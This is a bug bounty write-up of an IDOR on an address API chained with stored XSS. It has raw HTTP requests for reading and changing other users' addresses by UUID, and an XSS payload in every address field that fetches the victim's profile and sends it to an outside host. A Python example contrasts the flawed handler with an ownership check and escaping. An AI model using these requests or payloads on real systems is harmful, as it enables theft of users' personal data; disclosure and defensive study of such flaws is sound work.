IDOR: I know where you live
How we got there
This was a bug I found on one of my favourite programs.
Basically this IDOR was like a three-in-one, with a caveat:
- to update your address the app asked you to get in touch with support; I was able to bypass this
- the app also had an IDOR that allowed read/write of other users' addresses
- the app had XSS in the address fields
The caveat here was the IDOR: it only worked if you knew the user's UUID.
- however, I had asked the program manager if they would be interested in this by sending a message in a previous report I had sent.
Reproduction:
- go to dash-sas.xboy.me/address and click on edit; a popup states that if you want to change your info you have to get in touch with support: "reach us on 1234 123 0745 or [email protected]"
- I did some recon and found the address update endpoint
sas-api.xboy.me/users/*/
- fetch a user's addresses
GET /users/<UUID>/addresses HTTP/2
Host: sas-api.xboy.me
Authorization: Bearer <REPLACE_ME>
- add a user's address
POST /users/<UUID>/addresses HTTP/2
Host: sas-api.xboy.me
Authorization: Bearer <REPLACE_ME>
Content-Type: application/json
{
"city": "POC",
"country": "POC",
"country_code": "POC",
"line": "POC",
"postcode": "POC"
}
- Update an address
PATCH /users/addresses/<UUID> HTTP/2
Host: sas-api.xboy.me
Authorization: Bearer <REPLACE_ME>
Content-Type: application/json
{
"city": "POC",
"country": "POC",
"country_code": "POC",
"line": "POC",
"postcode": "POC"
}
- get XSS (stored, via the address fields)
PATCH /users/addresses/<UUID> HTTP/2
Host: sas-api.xboy.me
Authorization: Bearer <REPLACE_ME>
Content-Type: application/json
{
"city": "<img src=x onerror=\"fetch('https://dash-sas.xboy.me/me/').then(response => response.json()).then(data => {const xhr = new XMLHttpRequest();xhr.open('GET', `https://labs.xboy.me/data?data=${encodeURIComponent(JSON.stringify(data))}`, true);xhr.send();});\">",
"country": "<img src=x onerror=\"fetch('https://dash-sas.xboy.me/me/').then(response => response.json()).then(data => {const xhr = new XMLHttpRequest();xhr.open('GET', `https://labs.xboy.me/data?data=${encodeURIComponent(JSON.stringify(data))}`, true);xhr.send();});\">",
"country_code": "<img src=x onerror=\"fetch('https://dash-sas.xboy.me/me/').then(response => response.json()).then(data => {const xhr = new XMLHttpRequest();xhr.open('GET', `https://labs.xboy.me/data?data=${encodeURIComponent(JSON.stringify(data))}`, true);xhr.send();});\">",
"line": "<img src=x onerror=\"fetch('https://dash-sas.xboy.me/me/').then(response => response.json()).then(data => {const xhr = new XMLHttpRequest();xhr.open('GET', `https://labs.xboy.me/data?data=${encodeURIComponent(JSON.stringify(data))}`, true);xhr.send();});\">",
"postcode": "<img src=x onerror=\"fetch('https://dash-sas.xboy.me/me/').then(response => response.json()).then(data => {const xhr = new XMLHttpRequest();xhr.open('GET', `https://labs.xboy.me/data?data=${encodeURIComponent(JSON.stringify(data))}`, true);xhr.send();});\">"
}
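The two fixes the program needed are an object-level ownership check on the address endpoints and output encoding of the address fields. The following is an added example in Python (not the program's own code; user IDs, tokens and addresses are constructed sample data) that puts a handler mirroring the reported PATCH bug beside a hardened one and shows escaping on render:

```python
import html
import uuid
from typing import Optional

# Constructed sample data (not from the report): two users, a token lookup
# standing in for real bearer validation, and one address owned by Alice.
ALICE = uuid.UUID("11111111-1111-4111-8111-111111111111")
BOB = uuid.UUID("22222222-2222-4222-8222-222222222222")
TOKENS = {"tok-alice": ALICE, "tok-bob": BOB}
ADDR_ID = uuid.UUID("aaaaaaaa-aaaa-4aaa-8aaa-aaaaaaaaaaaa")
ADDRESSES = {ADDR_ID: {"owner": ALICE, "city": "Springfield", "line": "1 Main St"}}
FIELDS = ("city", "country", "country_code", "line", "postcode")


def caller_from_bearer(token: str) -> Optional[uuid.UUID]:
    """Hypothetical token check: returns the authenticated user or None."""
    return TOKENS.get(token)


def vulnerable_patch_address(token: str, address_id: str, body: dict) -> int:
    """Mirrors the bug: the bearer proves *someone* is logged in, and the
    address UUID from the path is trusted without an ownership check."""
    if caller_from_bearer(token) is None:
        return 401
    addr = ADDRESSES.get(uuid.UUID(address_id))
    if addr is None:
        return 404
    addr.update({k: v for k, v in body.items() if k in FIELDS})
    return 200


def hardened_patch_address(token: str, address_id: str, body: dict) -> int:
    """Object-level authorization: the address must belong to the caller."""
    caller = caller_from_bearer(token)
    if caller is None:
        return 401
    try:
        addr = ADDRESSES.get(uuid.UUID(address_id))
    except ValueError:
        return 400
    if addr is None or addr["owner"] != caller:
        return 404  # same answer for "missing" and "not yours": no UUID oracle
    addr.update({k: v for k, v in body.items() if k in FIELDS})
    return 200


def render_address(addr: dict) -> str:
    """Escape every stored field on output so address markup stays inert."""
    return "".join(f"<span>{html.escape(str(addr[k]))}</span>" for k in FIELDS if k in addr)
```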
Report
I sent a report to the program after receiving a go-ahead. It was accepted as a medium because UUID, man.